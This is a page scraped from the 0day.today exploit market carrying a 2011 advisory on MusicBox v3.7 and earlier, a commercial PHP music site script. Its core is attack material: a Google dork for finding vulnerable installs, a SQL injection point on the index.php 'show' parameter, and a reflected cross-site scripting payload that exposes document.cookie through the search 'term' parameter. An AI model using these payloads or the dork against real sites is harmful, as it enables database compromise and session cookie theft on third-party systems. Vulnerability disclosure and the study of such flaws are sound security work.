[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Musicbox v3.7 and previous version Multiple Vulnerabilites

Author
R@1D3N
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-16561
Category
web applications
Date add
25-07-2011
Platform
php
============================================================
MusicBox <= v3.7 Multiple Vulnerabilities
============================================================
 
 
[~] Author : R@1D3N (amin emami)
 
[~] Software Link : www.musicboxv2.com
 
[~] Price : $275
 
[~] Version : v3.7 and previous versions
 
[~] Contact : aminrayden@yahoo.com<script type="text/javascript">
/* <![CDATA[ */
(function(){try{var s,a,i,j,r,c,l=document.getElementById("__cf_email__");a=l.className;if(a){s='';r=parseInt(a.substr(0,2),16);for(j=2;a.length-j;j+=2){c=parseInt(a.substr(j,2),16)^r;s+=String.fromCharCode(c);}s=document.createTextNode(s);l.parentNode.replaceChild(s,l);}}catch(e){}})();
/* ]]> */
</script> <~
 
[~] DorK : inurl:genre_artists.php
 
[~] Forum : http://ashiyane.org/forums/
 
[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db
 
[~] Tested on: Windows XP Sp3
 
vul1.sql injection:
 
/[Path]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK]
 
Vul2.Cross site Scripting:
 
/[path]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0



#  0day.today [2024-11-15]  #